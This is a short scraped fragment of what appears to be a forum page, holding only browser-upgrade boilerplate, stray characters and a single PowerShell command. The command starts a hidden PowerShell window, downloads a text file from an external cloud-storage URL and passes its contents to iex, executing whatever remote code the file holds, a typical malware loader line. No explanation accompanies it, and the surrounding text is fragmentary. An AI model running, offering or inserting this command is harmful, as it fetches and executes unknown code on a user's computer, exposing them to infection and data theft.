You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser.
-
-
R
powershell.exe -W Hidden -command $url = 'https://zip-store.oss-ap-southeast-1.aliyuncs.com/marry-new.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
-